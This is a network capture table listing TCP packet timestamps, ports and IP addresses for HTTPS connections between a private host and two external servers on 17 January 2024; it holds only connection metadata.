                                                                                                                                                              Jan 17, 2024 17:39:33.282995939 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283046961 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283080101 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283098936 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.283118010 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283181906 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.283194065 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283216953 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.283262968 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.283690929 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.283718109 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.286217928 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.286252022 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.286319971 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.286809921 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.286823034 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287555933 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287610054 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287655115 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287655115 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.287682056 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287707090 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287724018 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.287729979 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.287775040 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.288527012 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.288683891 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.288705111 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.288733006 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.288738012 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.288774967 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.288877964 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289028883 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289071083 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.289076090 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289232016 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289263010 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289271116 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.289274931 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289315939 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.289449930 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289599895 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289649010 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.289653063 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289768934 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.289804935 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.289809942 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290581942 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290638924 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.290642977 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290663958 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290709972 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.290715933 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290790081 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.290827990 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.290832996 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.291263103 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.291311026 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.291315079 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.292946100 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.292974949 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.293060064 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.293456078 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.293467999 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.325612068 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.340996027 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.357979059 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.358057022 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.358113050 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.358160973 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.358793020 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.358850002 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.358906031 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.358973026 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.359081030 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359164953 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359249115 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359291077 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359307051 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.359328032 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359378099 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359415054 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.359441042 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.359453917 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359934092 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359968901 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.359993935 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360007048 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360047102 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360076904 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360090971 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360105038 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360131979 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360840082 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360903978 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360919952 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360928059 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360974073 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360981941 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.360992908 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.360994101 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.361073017 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.363725901 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.363795996 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.365559101 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.365627050 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.365659952 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.365725994 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.366050005 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.366101027 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.367352962 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.367413998 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.368458033 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.368532896 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.368563890 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.368617058 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.369982004 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.370038986 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.370086908 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.370162964 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.370173931 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.370227098 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.374593973 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.374669075 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.376785040 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.376869917 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.376897097 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.376969099 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.376996040 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377060890 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.377104044 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377165079 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.377444983 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377516031 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.377532959 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377602100 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.377629042 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377847910 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.377943993 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.377988100 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.378019094 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.403412104 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.403453112 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.403525114 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.404515028 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.404527903 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.405384064 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.405424118 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.405499935 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.405853987 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.405864954 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.466315985 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.466619015 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.466636896 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.467000008 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.467333078 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.467394114 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.467483997 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.469640970 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.469688892 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.469773054 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.470098972 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.470115900 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.475087881 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.475320101 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.475341082 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.475728989 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.476068974 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.476135969 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.476213932 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.488837957 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.498019934 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.498038054 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.499207020 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.499275923 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.504436016 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.504553080 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.505422115 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.505434036 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.513920069 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.517905951 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.521548986 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.559773922 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.616128922 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.616482019 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.616512060 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.617310047 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.617634058 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.617734909 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.617952108 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.618026018 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.618220091 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.618237019 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.618546009 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.618892908 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.618957043 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.619010925 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.655632019 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.655968904 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.655985117 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.656966925 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.657032013 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.657382011 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.657452106 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.658992052 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.659002066 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.661900997 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.661905050 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.669989109 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.701251984 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.855818033 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.855945110 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.856013060 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.856589079 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.856606007 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.865164995 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.865211010 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.865272045 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.865295887 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.865355015 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.865405083 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.867314100 CET49809443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.867336035 CET44349809172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930069923 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930124044 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930155039 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930179119 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930206060 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930207968 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.930227995 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930262089 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.930277109 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.930282116 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930320024 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.930362940 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.931536913 CET49810443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.931554079 CET44349810172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.681833029 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.681972980 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.682030916 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.682670116 CET49811443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.682687044 CET44349811172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.686868906 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.686923027 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.686952114 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.686980963 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.686984062 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.687000990 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.687056065 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.687071085 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.687087059 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.687154055 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.687180996 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.687305927 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.688026905 CET49813443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.688050032 CET44349813172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689455986 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689537048 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689587116 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689614058 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.689629078 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689673901 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689726114 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.689733028 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689774036 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.689779043 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.689939022 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.690094948 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.690264940 CET49812443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.690273046 CET44349812172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.697010994 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.697047949 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.697102070 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.697468042 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.697478056 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.699551105 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.699583054 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.699647903 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.700107098 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.700119019 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.707587004 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.707614899 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.707688093 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.708142042 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.708154917 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.794536114 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:34.794570923 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.794656992 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:34.795077085 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:34.795088053 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.884633064 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.885458946 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.885478973 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.885900021 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.886310101 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.886370897 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.886634111 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.891863108 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.892118931 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.892149925 CET44349816172.67.148.131192.168.2.4
